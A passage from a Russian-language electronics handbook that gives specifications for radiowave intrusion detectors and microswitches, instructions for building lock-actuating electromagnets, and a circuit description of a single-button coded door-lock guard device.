практически 100-процентное отсутствие ложных срабатываний в помещениях с интенсивной вентиляцией и быстрыми потоками воздуха;

установку нескольких извещателей в одном закрытом охраняемом помещении;

полуавтоматическую регулировку дальности действия в пределах заданных значений;

возможность работы с другими системами и датчиками обнаружения посторонних лиц.

Следует заметить, что большинство охранных извещателей, в том числе и типа «Волна-5», работают наиболее эффективно, если постороннее лицо попадает в центр зоны обнаружения. В данном случае сама зона обнаружения представляет собой замкнутый объем электромагнитных волн, излучаемых рассматриваемым датчиком, который действует на расстоянии до 16 м в горизонтальной и вертикальной плоскостях.

Основные электрические параметры и технические характеристики охранного извещателя " Волна-5"

Номинальное напряжение питающей сети

переменного тока. В................. 220

Номинальная частота питающейсети

переменного тока, Гц .................. 50

Номинальное напряжение автономного источника

питания постоянного тока, В ............... 9

Оптимальная площадь обнаружения посторонних лиц и охраняемом помещении, м2 ...............90

Расстояние до границы действия излучателя, м:

максимальная ....................... 12...16

минимальная ................... 3.. 4

Контролируемый объем, м^3, не менее ........... 200

Ток, потребляемый электронным извещателем

и рабочем режиме, мА, не более ........... 2

Габаритные размеры (без кронштейна), мм ...... 97Х9ЗХ52

Условия эксплуатации:

температура окружающей среды, °С ........ —30...+50

относительная влажность воздуха

при температуре 20 °С, % .............. 85±3

атмосферное давление воздуха,мм рт. ст. ..... 200...900

Следующим рекомендуемым к применению изделием промышленного производства для охраны закрытых помещении является извещатель типа «Аргумент-2», который относится к типу охранных объемных радиоволновых электронных устройств. Работает рассматриваемое изделие от сети переменного тока напряжением 220 В частотой 50 Гц или от автономного источника питания напряжением 12 В постоянного тока. В качестве автономного БП может быть использован источник питания «Электроника Д2-27», который имеет высокие технические характеристики. В состав этого изделия входят сетевой понижающий трансформатор питания, выпрямительное устройство и стабилизатор напряжения постоянного тока 12 В.

Рассматриваемый охранный объемный радиоволновый извещатель «Аргумент-2» устанавливается внутри помещения в местах наиболее вероятного нахождения постороннего лица при проникновении его в это помещение. Устройство охраны обеспечивает высокую обнаружительную способность, отсутствие ложных тревог при эксплуатации в помещениях с работающим оборудованием, установку и работу нескольких излучателей-извещателей в одном помещении, дистанционное управление. При проникновении постороннего лица в зону действия датчика излучателя охраняемое пространство закрытого помещения изменяет действующее внутри него электромагнитное поле, которое, в свою очередь, приводит к срабатыванию системы и формированию тревожного извещения размыканием выходных контактов исполнительного реле. Размыкание контактов реле приводит в действие световые или звуковые индикаторы и радиоизлучатель.

Активные зоны действия электронного охранного извещателя типа «Аргумент-2» в горизонтальной и вертикальной плоскостях приведены на рис. 3.4, где по осям абсцисс и ординат откладываются радиусы действия устройсва, дающие в сумме объемную картину электромагнитною поля, по типу приемно-передающей антенны.

3-21.jpg

Рис. 3.4. Схема зоны обнаружения постороннего лица:

а—в горизонтальной плоскости: б — ввертикальной плоскости.

Основные электрические параметры и технические характеристики излучателя «Аргумент-2»

Номинальное напряжение питающей сети

переменного тока,В .................... 220

Номинальная частота питающей сети

переменного токи, Гц .............. . . 50

Номинальное cтабилизированное напряжение питания функциональных узлов устройства постоянным током, В ........... ....... . . 12

Пределы изменения напряжения питающей сети

переменного тока, % ........ . . —10...+15

Пределы изменения частоты питающей сети

переменного тока, % ................ —1

Коэффициент нелинейных искажений питающей сети переменного тока, %, не более ............. 12

Дальность действия активного элемента устройства в закрытом помещении, м:

максимальная ...................... 16

минимальная ........................ 3

Активная площадь обнаружения посторонних лиц, м^2,

не менее ............................ 100

Объем закрытою помещения, обслуживаемый одним датчиком, м3, не менее ................... 250

Ток, потребляемый устройством в режиме

холостого хода, мА, не более ............... 80

Диапазон рабочих частот, МГц, в пределах которых устанавливается одна частота для конкретного объекта охраны ....................... 140...210

Длительность полного провала напряжения

питающей сети переменного тока, мс, не менее . . 250 Срок службы устройства при круглосуточном

включении датчика, ч, не менее ............. 5000

Вероятность безотказной работы устройства

при риске заказчика в=0,95, не менее ........ 0,99

Помехозащищенность электронного датчика при воздействии внешнего электромагнитного поля, дБ, не менее ......................... 120

Сопротивление изоляции токоведущих частей

относительно друг друга, МОм, не менее ....... 10

Условия эксплуатации:

температура окружающей среды, С ........ —30...+50

относительная влажность воздуха

при температуре 25 °С, %, не менее ....... 85

атмосферное давление воздуха, мм рт. ст. ..... 200...1000

Габаритные размеры, мм .................. 90х65х45

Гарантийный срок службы, г ................ 1

Конструктивно охранный извещатель «Аргумент-2» выполнен в виде прямоугольника сравнительно небольших размеров, который устанавливается на специальном кронштейне. При использовании рассматриваемого датчика в составе комплексной сторожевой системы предусмотрено применение автоматического дистанционного управления, которое позволяет включать его вторично после срабатывания ИМ звукового или светового оповещения. В этом случае данный извещатель становится дублирующим устройством с автономной передачей радиосигнала на ЦПУ с помощью радиоволн, работающих на выбранной частоте. Если будет вскрыта и заблокирована первая ступень защиты, то данная вторая ступень сработает вторично и предупредит о несанкционированном вторжении в охраняемое помещение.

Проблема охраны закрытых помещений с помощью объемных радиоволновых извещателей решается в полной мере только в том случае, если вся информация приходит на ЦПУ и действует система постоянного наблюдения и отслеживания.

Технические характеристики и основные электрические параметры некоторых типов электронных извещателей, изготавливаемых промышленным способом, приведены в табл. 3.5.

Особую группу датчиков, применяемых в сторожевых и сигнальных устройствах, составляют конечные выключатели, которые используются для коммутации электрических цепей постоянного или переменного тока. Часто применяются малогабаритные кнопки типа КМ, командные кнопки типа КН, кнопочные переключатели типа КП и микропереключатели типа МП.

Основные электрические параметры микропереключателей типа МП при различных видах нагрузки приведены в табл. 3.6.

Малогабаритные кнопочные переключатели типа КМ выпускаются двух типоразмеров: КМ1-1 и КМ2-1, они рассчитаны на эксплуатацию в самых жестких условиях воздействия климатических, механических, биологических и электромагнитных нагрузок. Микропереключатели этого типа обеспечивают коммутацию электрических цепей с активной нагрузкой постоянного тока от 0,0005 до 4 А с напряжением от 0,5 до 30 В и переменного тока частотой 50...400 Гц от 0,0005 до 3 А с напряжением от 0,5 до 250 В. Износостойкость переключателей составляет 10000 циклов переключений из положения «выключено» в положение «включено» и возвращение их в положение «выключено».

Модульные переключатели типов П2К и П2КЛ изготавливаются во всеклиматическом исполнении для эксплуа-

Таблица 3. 5. Основные электрические параметры и технические характеристики электронных извещателей

3-22.jpg

тации при температуре от —10 до 40 °С, относительной влажности воздуха до 90%, при температуре 25 °С и пониженном атмосферном давлении воздуха до 5 мм рт. ст. Эти переключатели составляются из отдельных ячеек (модулей) с различным числом контактных групп. Изготовляются пять типов модулей с числом контактных групп на переключение 2; 4; 6; 8. Все ячейки переключателя П2К имеют одинаковые размеры, за исключением длины, которая зависит от числа контактных групп. Переключатель П2К может состоять из одной ячейки и в таком виде применяется, как правило, в сторожевых устройствах. Допустимый постоянный ток через контакты при активной нагрузке равен 0, 1 А при напряжении 250 В и 1 А при напряжении 12 В; допустимый переменный ток через контакты равен 0, 2 А при напряжении до 250 В частотой 50 Гц и равен 1, 5 А при напряжении 12 В. Емкость между контактами не превышает 1, 5 пФ; тангенс угла диэлектрических потерь на частоте 1 МГц — не более 0, 05; сопротивление изоляции постоянному току в нормальных условиях не менее 50 МОм.

К числу переключателей с повышенной износостойкостью, надежностью и долговечностью относятся переключатели типа КМ, которые могут коммутировать электрические цепи постоянного и переменного тока с напряжением от 10 до 50 В и током от 0, 05 до 1, 5 А. Изготавливается командный кнопочный переключатель в виде трех типоразмеров: КН-1 однополюсного включения, КН-2 — двухполюсного включения и КН-П — однополюсного включения—выключения. Износостойкость этих переключателей составляет не менее 15000 циклов переключении.

Микропереключатели типа МП, представленные в табл. 3. 6, являются наиболее часто применяемыми в сторожевых устройствах. Перед установкой этих микропереключателей в качестве датчиков после длительного хранения необходимо произвести их тренировку (не менее 100 циклов). Износостойкость микропереключателей составляет 10 000 циклов переключении. Сопротивление изоляции при нормальных условиях эксплуатации — не менее 1000 МОм. Масса переключателей типов МП1-1, МПЗ-1, МП5 равна 3, 5 г, типов МП9, МП10, МП11 — 2, 7 г, типа MП7 — 0, 8 г, МП 12 — 0, 7 г.

В составе всех электронных и электромеханических сторожевых устройств с автоматическим управлением кроме датчиков и блоков электроники имеются ИМ и узлы. Необходимо заметить, что к процессам управления относятся: приведение в действие устройства (включение, пуск, подключение), прекращение действия (остановка, выключение) и регулирование. При автоматическом управлении сторожевыми устройствами в качестве датчиков используются контактные, автономные, реостатные, электролитические, проволочные, индуктивные, фотоэлектрические датчики, а также датчики температуры.

Также обязательным элементом электрической схемы сторожевого устройства является ИМ, устанавливаемый фактически на механических или электромеханических замках. Наиболее часто применяемыми исполнительными устройствами являются электрические магниты и соленоиды как промышленного, так и самодельного изготовления. Электропитание этих изделий осуществляется, как правило, от источников постоянного тока с низковольтным напряжением и малым потреблением тока. Например, для открывания дверного замка с защелкой может быть рекомендован электромагнит с питанием от выпрямителя постоянного тока 24 В, рассчитанного на ток от 0,25 до 0,5А. На рис. 3.5 приведена конструкция электромагнита, который развивает тяговое усилие не менее 3 кгс при указанных электрических параметрах. Самодельный электромагнит состоит из следующих деталей: 1 — гайка регулировочная; 2 — каркас катушки, состоящий из двух щечек и гильзы, изготавливаемых из гетинакса или пластмассы; 3 — опорный диэлектрический вкладыш-втулка, жестко закрепляемый в отверстии катушки; 4 — обмотка электромагнита (2700 витков провода ПЭВ-2 диаметром 0,31 мм, уложенных рядами виток к витку); 5 — пружина возвратная; 6 — шпилька Мб направляющая двусторонняя; 7 — сердечник; 8 — скоба-тяга, служащая для соединения с защелкой механического замка.

Сердечник электромагнита изготавливается из мягкой электротехнической стали марки 3311, 3312 или 3313. Конструкция сердечника определяет форму и размеры каркаса катушки и габаритные размеры электромагнита. Ход сердечника внутри катушки должен быть не менее 18 мм.

На рис. 3.6 дана конструкция тягового электромагнита, изготовленного из трансформатора питания или из дросселя фильтра типа Ш броневой конструкции. Рекомендуется выбрать такой трансформатор или дроссель, у которого магнитопровод выполнен методом шихтования из пластин электротехнической стали типа Ш20Х20. Для того чтобы изготовить тяговый электромагнит, необходимо произвести полную разборку трансформатора и выполнить следующую работу.

1. Из Ш-образных пластин вырезать центральные части магнитопровода, на которые устанавливается катушка с намотанными на нее проводами.

3-23.jpg

Рис. 3. 5. Конструкция тягового электромагнита с круглым магнитопроводом.

3-24.jpg

Рис. 3. 6. Конструкция тягового электромагнита, изготовленного из трансформатора типа Ш.

2. Собрать вырезанные части магнитопровода в пакет, скрепив его в двух местах немагнитными заклейнками.

3. Вырезать из стального листа толщиной 2 мм две накладки, контур которых полностью повторяет контур магнитопровода, представляющего собой замкнутый прямоугольник с размерами 80Х70 мм по наружному периметру и 60Х50 по внутреннему. По углам накладок просверлить четыре отверстия диаметром 4,5 мм.

4. Собрать все разрезанные части пластин магнитопровода в пакеты, закрыть их с обеих сторон накладками и скрепить немагнитными заклепками или шпильками.

5. Изготовить новый каркас катушки из гетинакса или стеклотекстолита толщиной 1 мм, с размерами, обеспечивающими установку катушки внутри магнитопровода. Внутреннее отверстие каркаса должно иметь размеры 20,5Х20,5 мм.

6. Намотать на каркас катушки провод марки ПЭЛ (ПЭВ-1, ПЭВ-2, ПЭТВР) диаметром 0,25 мм рядовым способом (виток к витку) в количестве 3000 витков.

7. Закрепить катушку с обмоточным проводом и магнитопровод в единую конструкцию и произвести пропитку изоляционным лаком.

8. Собрать и закрепить якорь электромагнита, как показано на рис. 3.6.

В состав электромагнита входят следующие основные детали конструкции: 1— магнитопровод в сборе; 2 — якорь в сборе; 3 — скоба (2 шт); 4— скоба-тяга, соединяющая якорь с защелкой механического замка; 5 — немагнитная заклепка; 6 — накладка (2 шт); 7 — обмотка электромагнита; 8 — каркас катушки; 9 — немагнитная заклепка.

Таблица 3.6. Основные электрические параметры микропереключателей типа МП

t11.jpg

Рис. 3.4. Схема зоны обнаружения постороннего лица: а—в горизонтальной плоскости: б — в вертикальной плоскости.

Изображение: 

Рис. 3.5. Конструкция тягового электромагнита с круглым магнитопроводом.

Изображение: 

Рис. 3.6. Конструкция тягового электромагнита, изготовленного из трансформатора типа Ш.

Изображение: 

Таблица 3. 5. Основные электрические параметры и технические характеристики электронных извещателей

Изображение: 

Таблица 3.6. Основные электрические параметры микропереключателей типа МП

Изображение: 

3. 3. Электронное сторожевое устройство с однокнопочным управлением

3. 3. ЭЛЕКТРОННОЕ СТОРОЖЕВОЕ УСТРОЙСТВО С ОДНОКНОПОЧНЫМ УПРАВЛЕНИЕМ

Электронное устройство с индикаторным управлением, работающее от одного замыкающего переключателя, предназначено для эксплуатации в условиях УХЛ. Устанавливается устройство на входных дверях жилых и производственных помещений. Работает сторожевое устройство как от сети переменного тока напряжением 220 В частотой 50 Гц, так и от автономного источника питания напряжением 9 В постоянного тока. При этом питание ИМС обеспечивается стандартным напряжением 5 В.

Отличительной особенностью рассматриваемого изделия является наличие в его составе счетно-решающего устройства, позволяющего кодировать, и дешифровать определенное число цифр и использовать то устройство в качестве кодового замка, управляемого одной кнопкой по сигналам светодиода, используемого для отсчета порядковой цифры кода. При этом набор каждой цифры осуществляется только при замкнутых контактах переключателя SB1 то есть. при нажатии этой кнопки и отпускании ее в момент отсчета очередной кодовой цифры.

Сторожевое устройство, оснащенное специальным ИМ, может быть использовано также для блокировки открывания обычных механических врезных замков, устанавливаемых как на наружных, так и на внутренних дверях помещений бытового и хозяйственного назначения, например на садово-огородных и приусадебных участках. Одно такое устройство может охранять только один объект. При этом обеспечивается двойная защита от открывания дверей, так как даже при наличии необходимого ключа замок невозможно открыть без знания четырех- или восьмизначного кода.

Незначительная конструктивная доработка врезного механического замка любой конструкции, заключающаяся в установке дополнительного стопора, который работает от маломощного тягового магнита или от электромагнитного реле, доступна начинающему радиолюбителю в домашней мастерской.

Сторожевое устройство может быть рекомендовано также для охраны гаражей и складских помещений при эксплуатации в условиях повышенной влажности (до 98%) и при температуре окружающей среды от —35 до 45 °С.

Принципиальная электрическая схема электронного сторожевого устройства с однокнопочным индикаторным управлением, его электронной части приведена на рис.3.7. Как следует из схемы, сторожевое устройство включает в свой состав входные цепи с защитой от помех, проникающих в промышленную электросеть, и с защитой от перенапряжения и коротких замыканий, сетевой понижающий трансформатор питания Т1, выпрямитель, работающий на емкостный фильтр, стабилизатор напряжения, автономный источник питания постоянного тока, кодирующее, счетно-решающее устройство с управляющей системой и ИМ.

Входные цепи предназначены для подключения сторожевого устройства к сети переменного тока напряжением 220 В частотой 50 Гц и защиты его электронной части от проникающих в сеть питания электромагнитных помех низкой частоты. Для этого во входной цени установлен емкостный фильтр, собранный из конденсаторов С1 и С2. Плавкий предохранитель F1 обеспечивает дополнительную защиту всего устройства от коротких замыканий, он рассчитан на максимальный ток 0,25 А. Подключается сторожевое устройство к сети с помощью стандартного электрического соединителя тина «вилка»,обозначенного на схеме X1.

Сетевой понижающий трансформатор питания Т1 может быть выбран из унифицированного ряда или изготовлен в домашней мастерской на броневом магнитопроводе типа Ш или ШЛ, моточные данные которого приведены в табл.3.7. При самодельном изготовлении трансформатор должен содержать три обмотки: одну первичную, рассчитанную на напряжение 220 В переменного тока, и две вторичные обмотки, обеспечивающие заданный уровень выпрямленных напряжений постоянного тока 5 и 9 В.

Сетевой трансформатор питания кроме трансформации напряжения обеспечивает полную гальваническую развязку всех вторичных цепей электронной схемы устройства от сети высокого напряжения переменного тока и надежную защиту и электробезопасность при наладке устройства.

Таблица 3.7. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном сторожевом устройстве с однокнопочным управлением

3-31.jpg

Для получения повышенного качества, надежности и долговечности трансформатора необходимо обеспечить соблюдение определенных правил при проведении технологических операций изготовления трансформатора. Это в первую очередь касается процесса рядовой укладки обмоточных проводов, межслойной изоляции и пропитки витков нитролаком. Трансформатор питания имеет одну катушку каркасной конструкции, которая устанавливается на центральном стержне магнитопровода. Активная площадь поперечного сечения стали магнитопровода должна быть не менее 4 см2. Магнитопровод с увеличенным сечением стали потребует большего объема и площади при установке на шасси. Между первичной и вторичными обмотками трансформатора через изоляционные прокладки наматывается один слой обмоточного провода диаметром 0,21...0,31 мм или медной ленты плотно виток к витку, рядовой намоткой. Этот слой обмоточного провода является экраном, который защищает трансформатор и устройство в целом от различных электромагнитных помех внешнего поля, действующего в первичных цепях.

Магнитопровод трансформатора питания вместе с катушкой должен быть закрыт защитным кожухом, который кроме функции механической защиты от случайных повреждений обмоточного провода дополнительно защищает и от наведенных электромагнитных полей, предотвращая ложные срабатывания. Для изготовления трансформатора Т1 лучше всего воспользоваться готовым ленточным магнитопроводом витой конструкции типа ШЛ20Х20 или ШЛ20Х25.

Рекомендуется при сборке устройства установить трансформатор на металлическом шасси, изготовленном из дюралюминия толщиной не менее 2 мм. На нем же можно укрепить плату с комплектом выпрямительных диодов.

На выходе вторичных обмоток трансформатора собрано два выпрямителя на восьми маломощных диодах VD1—VD8, которые преобразуют переменный ток частотой 50 Гц в постоянное напряжение 5 и 9 В. Оба выпрямителя работают на емкостные фильтры, собранные на оксидных электролитических конденсаторах. Выпрямители смонтированы по однофазным двухполупериодным мостовым схемам, каждый на четырех полупроводниковых диодах. Примененная в данном случае выпрямительная мостовая схема характеризуется повышенной частотой пульсации выпрямленного напряжения постоянного тока, достаточно высоким коэффициентом использования габаритной мощности сетевого понижающего трансформатора, малым значением обратного напряжения и тока на полупроводниковых диодах, повышенными потерями и несколько меньшим кпд по сравнению с другими типами выпрямительных схем (однополупериодной; со средним выводом и т. д.).

Необходимо отметить, что наиболее часто мостовые схемы применяются в различных радиолюбительских конструкциях, обеспечивая достаточно высокий уровень выпрямленного тока (40...500 мА) в зависимости от примененных полупроводниковых выпрямительных диодов.

Первый выпрямитель собран на диодах VD1—VD4, второй — на диодах VD5—VD8. На входах выпрямителей и соответственно на вторичных обмотках трансформатора питания Т1 действует переменное напряжение до 6,3 В и до 12 В.

Электролитические конденсаторы СЗ, С4 и С5 дополнительно сглаживают пульсации выпрямленного напряжения, образуют емкостные фильтра. При этом конденсатор С5 установлен после ПСН.

На выходе первого выпрямителя VD1—VD4 собран ПСН, обеспечивающий электропитание микросхем счетно-решающего узла сторожевого устройства постоянным напряжением +5 В. Подключение всех примененных в устройстве ИМС к данному источнику питания показано на рис. 3.7. К выводу 14 ИМС DA1 и DA2, к выводу 5 ИМС DA3 и DA4, к выводу 16 ИМС DA5 и DA6 подключается стабилизированное напряжение 5 В.

ПСН собран на двух стабилитронах VD9 и VD10, которые обеспечивают коэффициент сигнализации не менее 100 и являются одновременно источниками образцового напряжения. Перед подключением ИМС к стабилизатору напряжения в указанных на схеме токах необходимо убедиться в том, что входное напряжение удовлетворяет требованию: Uвх min <=Uвх<=Uвх max. При токе нагрузки Iн<=0,025 А и номинальном выходном напряжении 5 В значения указанных параметров должны иметь следующие значения: Uвхmin = 6...8 В; Uвх max = 7...9,5 В; Rвых max == 0,15 Ом; Uвых = 5 В. Измерения производятся при отсутствии нагрузки, то есть на холостом ходу.

Второй выпрямитель также собран по мостовой схеме на четырех полупроводниковых диодах VD5—VD8, он обеспечивает на выходе выпрямленное напряжение постоянного тока 9 В и работает на емкостный фильтр.

Подключаемая к выпрямителю нагрузка не превышает 100 мА. На выходе второго выпрямителя собрана электронно-механическая система защиты, которая предотвращает повреждение как дорогостоящих элементов самого выпрямителя и стабилизатора, так и схемы нагрузки при коротких замыканиях и перегрузках. Ток, при котором срабатывает система защиты, равен 100...110 мА.

В составе защитного устройства собран стабилизатор постоянного напряжения, защищенный также от выхода из строя при отключенной нагрузке. Для этого на выходе установлен двухваттный резистор, который поддерживает нормальный режим работы элементов стабилизатора. Стабилизатор образован транзистором VT2 и стабилитроном VD11 и обеспечивает напряжение пульсации, которое незначительно при максимальном токе нагрузки и не превышает 10 мВ. Собранная в составе данного устройства система защиты включает в свой состав два электромагнитных реле К1 и К2, транзистор VT1, резисторы R1—R3 и индикаторную лампу H1.

При коротком замыкании в выходных цепях после точек А и Б или в подключенной к ним схеме сторожевого устройства, как только ток через проволочный резистор R1 превысит заданное максимальное значение (100...110 мА), срабатывает на открывание транзистор VT1, через который напряжение поступает на электромагнитное реле К2. Реле срабатывает, замыкая свои контакты К2.1. Вслед за этим напряжение питания будет подано на обмотку электромагнитного реле К7, оно сработает и разомкнет контакты К1.1, отключив нагрузку сторожевого устройства от сети питания.

Таким образом, если постороннее лицо захочет отключить питание и обесточить сторожевое устройство, думая, что сможет открыть механический замок обычным ключом, то у него это не получится, так как только знание секрета стопорения механической части сторожевого устройства (замка) сможет обеспечить беспрепятственное открывание дверей. Здесь необходимо заметить, что сторожевое устройство после включения питания не только сохраняет свой код, но и тут же готово к дальнейшей работе.

В схеме защиты сторожевого устройства установлена сигнальная лампа H1 и параллельно ей смонтирован резистор R3, через который протекает ток, удерживающий якорь реле К1 в нормальном положении и предотвращающий повторное срабатывание. После срабатывания системы защиты необходимо отключить электропитание и вновь включить, замкнув контакты переключателя S1.

В точках А и Б принципиальной схемы может быть подключен автономный источник питания—ХИТ любого типа, имеющий на выходе напряжение питания постоянного токя 9В и отвод, на котором должно действовать напряжение 5...6 В.

Счетно-решающее устройство — основная часть электронной схемы сторожевого устройства — включает в свой состав шесть ИМС, работающих в режиме счета и сравнения с установленным заранее кодом. Для более полного описания принципа работы сторожевого устройства введем следующие обозначения и определения элементов ИМС:

элемент ИМС DA1 с выводами 8...13 образует триггер;

элемент ИМС DA3 с выводами 1...3, 8, 9, 11, 12 и 14 образует счетчик числа импульсов;

элемент ИМС DA4 с выводами 1...3, 8, 9, 11, 12 и 14 образует счетчик числа импульсов;

элемент ИМС DA1 с выводами 2.. .6 образует триггер;

элемент ИМС DA2 с выводами 1...3 образует инвертор, который вместе с транзистором VT1 образует тактовый генератор;

элемент ИМС DA2 с выводами 4.. .6 образует триггер;

элемент ИМС DA2 с выводами 1...3 образует инвертор;

элемент ИМС DA2 с выводами 11...13 образует триггер;

микросхема DA5 является дешифратором заданного кода при его наборе на пульте управления сторожевого устройства;

микросхема DA6 является мультиплексором. Исходя из классификации электронных устройств и изделий и определений, принятых в технической литературе и государственных стандартах, триггером называется электронное переключающее устройство, которое сколь угодно долго сохраняет одно из двух своих состояний устойчивого равновесия и скачкообразно переключается по сигналу извне из одного состояния в другое; инвертором называется электронное устройство, преобразующее сигнал низкого уровня логического нуля на входе в сигнал высокого уровня логической единицы на выходе и наоборот, что эквивалентно операции отрицания; тактовым генератором называется устройство, вырабатывающее электрические сигналы — колебания с заданной частотой; дешифратором

называется устройство для автоматической расшифровки (декодирования) сообщения и переиода содержащейся в нем информации на язык (код) воспринимающей системы.

ИМС DA4 распознает в процессе работы цифры, набираемые при замыкании контактов переключателя S1 по числу зажигания светодиода HL1.

Перед началом эксплуатации сторожевого устройства необходимо произвести операцию установления нужного кода, которая осуществляется включением соответствующих перемычек между выводами мультиплексора (ИМС DA6) и выводами дешифратора (ИМС DA5). При этом следует иметь в виду, что набор номера кода на дешифраторе начинается с вывода 7, которому соответствует первая набранная в коде цифра 5 (в данном случае). Этот вывод, равно как и последующие, можно соединять с выводами мультиплексора (DA6) практически в любой последовательности (с 1—4 и с 12—15).

Выводу 6 ИМС DA5 соответствует цифра 6 кода сторожевого устройства, выводу 5 — цифра 7, выводу 4 — цифра 8, выводу 9 — цифра 1, выводу 10 — цифра 2, выводу 11 — цифра 3, выводу 12 — цифра 4.

Если соединить выводы ИМС DA5, как показано на рис. 3.7, с выводами мультиплексора DA6, то будет закодировано число из 8 цифр: 66112233.

Для того чтобы более точно устанавливать шифр (код) сторожевого устройства, необходимо смонтировать параллельно друг другу (лучше на лицевой панели корпуса сторожевою устройства) две планки с восьмью контактными приборными зажимами, к которым подключаются выводы ИМС DA5 и DA6. Если к контактам первой планки подключить выводы от ИМС DA5 сверху вниз, как показано на схеме, то мы будем иметь восьмиразрядный набор шифра сторожевого устройства от 1 до 8 при условии, что соединения всех остальных выводов ИМС останутся такими же, как на схеме.

Таким образом, на первой планке, соединенной с дешифратором DA5, необходимо сделать гравировку или выполнить надписи от 1 до 8, соответствующие набираемому коду. При этом у выхода АО (вывод 5 ИМС DA5) должна быть проставлена цифра 5 будущего кода. У выхода А1 — цифра 2 и т. д. На второй параллельной планке, контакты которой соединены с выводами мультиплексора ИМС DA6, также должны быть написаны цифры от 1 до 8, соответствующие порядку считывания набранного кода

этим устройством в автоматическом режиме работы. Цифры на этой планке располагаются по порядку: 1, 2... 8. При этом первой цифре автоматического счета соответствует выход Д0 (вывод 4) и т. д.

Порядок соединений контактов на параллельных планках сторожевого устройства приведен в табл. 3. 8.

Таблица 3. 8. Порядок соединений контактов при кодировании и считывании кода

3-32.jpg

Например, если контакты на параллельных планках соединить с выводами ИМС DA5 и DA6 следующим образом: вывод 6 DA5 с выводами 4 я 3 DA6; вывод 9 DA5 с выводами 2 и 1 DA6; вывод 10 DA5 с выводами 14 и 15 DA6;

вывод 11 DA5 с выводами 7 и 8 DA6, то мы получим указанный выше код сторожевого устройства 66112233. Еще один пример кодирования сторожевого устройства при соединении контактов на параллельных планках. Соединяя выводы DA5 с выводами DA6 в следующей последовательности: 5 с 4; 10 с 3; 7 с 2; 11 с 1; 6 с 15; 12 с 14; 4 с 13;

9 с 12, получим новый шифр устройства: 72536481, который необходимо запомнить для точного воспроизведения при дешифровании и открывании дверей. Очевидно, что в данном случае может быть выбрано любое произвольное сочетание восьми цифр кода, известное лишь его владельцу. В рассматриваемом варианте случайного набора кода необходимо выполнить 40320 операций, каждый раз запоминая или записывая пройденный набор цифр. Это практически непосильная задача для злоумышленника.

Набор шифра сторожевого устройства во всех случаях производится только после полной сборки всех узлов и блоков и необходимой проверки их работоспособности. Для удобства перекодирования шифра планки на лицевой панели устройства снабжаются приборными малогабаритными контактными зажимами типа КМЗ-1. Длина монтажных проводников, соединяющих зажимы с выводами ИМС, должна быть минимальной. Монтаж этих проводников рекомендуется осуществлять как пайкой, так и под резьбовые соединения. Конструкция электрической части сторожевого устройства определяется примененными ЭРИ и ЭРЭ, и в первую очередь расположением крупногабаритных элементов. Размеры по высоте и ширине могут быть произвольными и зависят не только от габаритов сетевого трансформатора, но и опыта и материальных возможностей домашнего мастера. Наиболее технологичной является прямоугольная конструкция, например, рекомендуется применять унифицированную базовую конструкцию «База-3» и «База-4».

Работает сторожевое устройство следующим образом. После включения устройства в сеть переменного тока или при подключении его к устройству автономного питания и замыкания контактов переключателей S1 или S2 сторожевое устройство подготовлено к работе и находится в ждущем режиме. В этот момент можно обычным ключом закрыть входную дверь и в замке сработает блокировочный упор электромагнита. Индикаторные лампы не светятся, и теперь открыть дверь ключом без снятия блокировки невозможно. Сторожевое устройство включено в режим холостого хода. Вариант конструкции блокировочного узла, работающего от электромагнита, рассмотрим ниже.

Электронная часть сторожевого устройства с мультиплексором и дешифратором в начальном состоянии находится в ждущем режиме. ИМС, выполняющие роль счетчиков при правильном наборе кода, дают электрический сигнал на ИМ, разрешающий открывание замка ключом. Основными элементами этой схемы являются мультиплексор и демультиплексор, которые определяют правильность набора кода.

Следует отметить важную особенность сторожевого устройства, заключающуюся в том, что работает оно от одного электрического соединителя SBI, а отсчет числа срабатывании осуществляется визуально по вспыхиванию светодиода зеленого или красного цвета. Если светодиод вспыхнул три раза и в это время контакты переключателя SB1 будут разомкнуты, то это значит, что была набрана цифра 3 кода. Но она должна находиться в строго определенном месте кода при его расшифровке. Для расшифровки кода и получения возможности открыть дверь не обходимо последовательно набрать все восемь цифр установленного кода. Для этого необходимо замкнуть контакты (нажать кнопку) переключателя SB1 и подать питание на ИМС DA1 (вывод 12), триггер которой срабатывает на инверторном выходе (вывод 9), и появится высокий уровень логической единицы, который приведет оба счетчика импульсов ИМС DA3 и DA4 в исходное состояние. При этом второй триггер ИМС DA1 (выводы 2. ..6) срабатывает, и при правильном наборе первой цифры начинает работать генератор импульсов (транзистор VT1) и инвертор ИМС DA2 (выводы 1...3).

Работа сторожевого устройства начинается сразу же после замыкания контактов переключателя SB1. После включения первого триггера ИМС DA1 (выводы 8. ..13} начинает работать счетчик ИМС DA3, который будет переключать свои разряды постоянно от 0 до 15, пока замкнуты контакты переключателя SB1 и при каждом переключении будет вспыхивать индикаторный светодиод VD13. Выбор необходимой цифры кода определяется числом включений светодиода. Если разомкнуть контакты переключателя SB1 в момент шестого включения, то закодированная цифра равна 6. Лучше всего для данной схемы сторожевого устройства использовать переключатель с кнопочным управлением. Для набора любой цифры кода, например 5, необходимо нажать на кнопку SB1, отсчитать пять вспышек светодиода и отпустить ее в этот момент.

Нет, видимо, необходимости во всех подробностях описывать внутренние процессы в ИМС при замыкании контактов переключателя SB1. Отметим только, что при первом нажатии на кнопку переключателя счетчик, собранный на ИМС DA1, начинает работать и загорается светодиод HL1 (VD13), вслед за этим на выходе мультиплексора DA6 (вывод 6) появляется высокий уровень логической единицы, который передается на триггер ИМС

DA2 (вывод 2). Если разомкнуть контакты переключателя SB1 сразу же после первого загорания светодиода, то начальная цифра кода равна 1 и не соответствует закодированной. При этом на выводе 9 счетчика DA3 появляется высокий уровень логической единицы, который откроет выход дешифратора DA5 (выход 10). После следующего включения откроется следующий выход дешифратора (вывод 11) и т. д.

При правильном последовательном наборе всех цифр кода открываются также последовательно входы мультиплексора DA6. После первой правильной цифры низкий уровень логического нуля появляется на выводе 3 ИМС DA6, после второй цифры 6 — на выводе 2 этой же микросхемы, после третьей правильной цифры 1 низкий уровень появляется на выводе 1 ИМС DA6 и т. д.

Если кнопка SB1 набора кода отпускается в момент, не соответствующий правильной цифре, то последующие входы микросхемы будут закрыты и набор кода не состоится.

Когда набраны правильно все цифры кода, срабатывает счетчик, собранный на ИМС DA4, подготавливая передачу сигнала на ИМ (электромагнит или электромеханическое реле) через транзистор VT2, выполненный по схеме усилителя тока. Время горения светодиода и паузы между вспышками регулируются подбором сопротивлений резисторов и емкостей конденсаторов, включенных в схему генератора.

